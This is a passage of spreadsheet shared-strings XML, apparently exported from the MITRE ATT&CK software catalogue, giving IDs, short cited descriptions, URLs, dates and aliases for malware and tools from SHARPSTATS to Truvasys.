    <t>[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0450</t>
  </si>
  <si>
    <t>S0028</t>
  </si>
  <si>
    <t>SHIPSHAPE</t>
  </si>
  <si>
    <t>[SHIPSHAPE](https://attack.mitre.org/software/S0028) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0028</t>
  </si>
  <si>
    <t>S0063</t>
  </si>
  <si>
    <t>SHOTPUT</t>
  </si>
  <si>
    <t>[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0063</t>
  </si>
  <si>
    <t>Backdoor.APT.CookieCutter, Pirpi</t>
  </si>
  <si>
    <t>S0217</t>
  </si>
  <si>
    <t>SHUTTERSPEED</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0217</t>
  </si>
  <si>
    <t>S0533</t>
  </si>
  <si>
    <t>SLOTHFULMEDIA</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)  
In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0533</t>
  </si>
  <si>
    <t>JackOfHearts, QueenOfClubs</t>
  </si>
  <si>
    <t>S0218</t>
  </si>
  <si>
    <t>SLOWDRIFT</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0218</t>
  </si>
  <si>
    <t>S0159</t>
  </si>
  <si>
    <t>SNUGRIDE</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0159</t>
  </si>
  <si>
    <t>S0157</t>
  </si>
  <si>
    <t>SOUNDBITE</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0157</t>
  </si>
  <si>
    <t>S0035</t>
  </si>
  <si>
    <t>SPACESHIP</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0035</t>
  </si>
  <si>
    <t>S0390</t>
  </si>
  <si>
    <t>SQLRat</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0390</t>
  </si>
  <si>
    <t>S0559</t>
  </si>
  <si>
    <t>SUNBURST</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0559</t>
  </si>
  <si>
    <t>05 January 2021</t>
  </si>
  <si>
    <t>Solorigate</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>S0562</t>
  </si>
  <si>
    <t>SUNSPOT</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0562</t>
  </si>
  <si>
    <t>12 January 2021</t>
  </si>
  <si>
    <t>S0578</t>
  </si>
  <si>
    <t>SUPERNOVA</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0578</t>
  </si>
  <si>
    <t>18 February 2021</t>
  </si>
  <si>
    <t>S0519</t>
  </si>
  <si>
    <t>SYNful Knock</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0519</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>S0464</t>
  </si>
  <si>
    <t>SYSCON</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0464</t>
  </si>
  <si>
    <t>S0074</t>
  </si>
  <si>
    <t>Sakula</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0074</t>
  </si>
  <si>
    <t>Sakurel, VIPER</t>
  </si>
  <si>
    <t>S0370</t>
  </si>
  <si>
    <t>SamSam</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0370</t>
  </si>
  <si>
    <t>15 April 2019</t>
  </si>
  <si>
    <t>18 April 2019</t>
  </si>
  <si>
    <t>Samas</t>
  </si>
  <si>
    <t>S0053</t>
  </si>
  <si>
    <t>SeaDuke</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0053</t>
  </si>
  <si>
    <t>SeaDaddy, SeaDesk</t>
  </si>
  <si>
    <t>S0345</t>
  </si>
  <si>
    <t>Seasalt</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0345</t>
  </si>
  <si>
    <t>S0382</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0382</t>
  </si>
  <si>
    <t>S0596</t>
  </si>
  <si>
    <t>ShadowPad</t>
  </si>
  <si>
    <t xml:space="preserve">[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0596</t>
  </si>
  <si>
    <t>POISONPLUG.SHADOW</t>
  </si>
  <si>
    <t>S0140</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0140</t>
  </si>
  <si>
    <t>Disttrack</t>
  </si>
  <si>
    <t>S0546</t>
  </si>
  <si>
    <t>SharpStage</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0546</t>
  </si>
  <si>
    <t>S0444</t>
  </si>
  <si>
    <t>ShimRat</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0444</t>
  </si>
  <si>
    <t>12 May 2020</t>
  </si>
  <si>
    <t>S0445</t>
  </si>
  <si>
    <t>ShimRatReporter</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0445</t>
  </si>
  <si>
    <t>S0589</t>
  </si>
  <si>
    <t>Sibot</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0589</t>
  </si>
  <si>
    <t>S0007</t>
  </si>
  <si>
    <t>Skeleton Key</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0007</t>
  </si>
  <si>
    <t>S0468</t>
  </si>
  <si>
    <t>Skidmap</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0468</t>
  </si>
  <si>
    <t>09 June 2020</t>
  </si>
  <si>
    <t>26 June 2020</t>
  </si>
  <si>
    <t>S0226</t>
  </si>
  <si>
    <t>Smoke Loader</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware.
[Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0226</t>
  </si>
  <si>
    <t>Dofoil</t>
  </si>
  <si>
    <t>S0273</t>
  </si>
  <si>
    <t>Socksbot</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that  abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0273</t>
  </si>
  <si>
    <t>S0516</t>
  </si>
  <si>
    <t>SoreFang</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0516</t>
  </si>
  <si>
    <t>S0543</t>
  </si>
  <si>
    <t>Spark</t>
  </si>
  <si>
    <t xml:space="preserve">
[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0543</t>
  </si>
  <si>
    <t>15 December 2020</t>
  </si>
  <si>
    <t>S0374</t>
  </si>
  <si>
    <t>SpeakUp</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0374</t>
  </si>
  <si>
    <t>29 March 2020</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>S0058</t>
  </si>
  <si>
    <t>SslMM</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0058</t>
  </si>
  <si>
    <t>S0188</t>
  </si>
  <si>
    <t>Starloader</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0188</t>
  </si>
  <si>
    <t>Alan Neville, @abnev</t>
  </si>
  <si>
    <t>S0380</t>
  </si>
  <si>
    <t>StoneDrill</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0380</t>
  </si>
  <si>
    <t>14 May 2019</t>
  </si>
  <si>
    <t>DROPSHOT</t>
  </si>
  <si>
    <t>S0142</t>
  </si>
  <si>
    <t>StreamEx</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0142</t>
  </si>
  <si>
    <t>S0491</t>
  </si>
  <si>
    <t>StrongPity</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0491</t>
  </si>
  <si>
    <t>20 July 2020</t>
  </si>
  <si>
    <t>S0018</t>
  </si>
  <si>
    <t>Sykipot</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0018</t>
  </si>
  <si>
    <t>S0242</t>
  </si>
  <si>
    <t>SynAck</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0242</t>
  </si>
  <si>
    <t>S0060</t>
  </si>
  <si>
    <t>Sys10</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0060</t>
  </si>
  <si>
    <t>S0096</t>
  </si>
  <si>
    <t>Systeminfo</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0096</t>
  </si>
  <si>
    <t>S0098</t>
  </si>
  <si>
    <t>T9000</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0098</t>
  </si>
  <si>
    <t>S0586</t>
  </si>
  <si>
    <t>TAINTEDSCRIBE</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0586</t>
  </si>
  <si>
    <t>05 March 2021</t>
  </si>
  <si>
    <t>S0164</t>
  </si>
  <si>
    <t>TDTESS</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0164</t>
  </si>
  <si>
    <t>S0560</t>
  </si>
  <si>
    <t>TEARDROP</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0560</t>
  </si>
  <si>
    <t>S0146</t>
  </si>
  <si>
    <t>TEXTMATE</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0146</t>
  </si>
  <si>
    <t>S0131</t>
  </si>
  <si>
    <t>TINYTYPHON</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor  that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0131</t>
  </si>
  <si>
    <t>S0436</t>
  </si>
  <si>
    <t>TSCookie</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0436</t>
  </si>
  <si>
    <t>S0199</t>
  </si>
  <si>
    <t>TURNEDUP</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0199</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>S0263</t>
  </si>
  <si>
    <t>TYPEFRAME</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0263</t>
  </si>
  <si>
    <t>S0011</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) is malware that has been used since at least 2010, primarily to target Taiwanese government organizations. (Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0011</t>
  </si>
  <si>
    <t>S0467</t>
  </si>
  <si>
    <t>TajMahal</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0467</t>
  </si>
  <si>
    <t>08 June 2020</t>
  </si>
  <si>
    <t>S0057</t>
  </si>
  <si>
    <t>Tasklist</t>
  </si>
  <si>
    <t>The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0057</t>
  </si>
  <si>
    <t>S0595</t>
  </si>
  <si>
    <t>ThiefQuest</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0595</t>
  </si>
  <si>
    <t>EvilQuest, MacRansom.K</t>
  </si>
  <si>
    <t>S0004</t>
  </si>
  <si>
    <t>TinyZBot</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0004</t>
  </si>
  <si>
    <t>S0183</t>
  </si>
  <si>
    <t>Tor</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0183</t>
  </si>
  <si>
    <t>S0266</t>
  </si>
  <si>
    <t>TrickBot</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0266</t>
  </si>
  <si>
    <t>10 April 2021</t>
  </si>
  <si>
    <t>TSPY_TRICKLOAD, Totbrick</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus; Daniyal Naeem, BT Security; FS-ISAC; Omkar Gudhate</t>
  </si>
  <si>
    <t>S0094</t>
  </si>
  <si>
    <t>Trojan.Karagany</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0094</t>
  </si>
  <si>
    <t>14 October 2020</t>
  </si>
  <si>
    <t>Karagany, xFrost</t>
  </si>
  <si>
    <t>S0001</t>
  </si>
  <si>
    <t>Trojan.Mebromi</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0001</t>
  </si>
  <si>
    <t>S0178</t>
  </si>
  <si>
    <t>Truvasys</t>
  </si>
  <si>
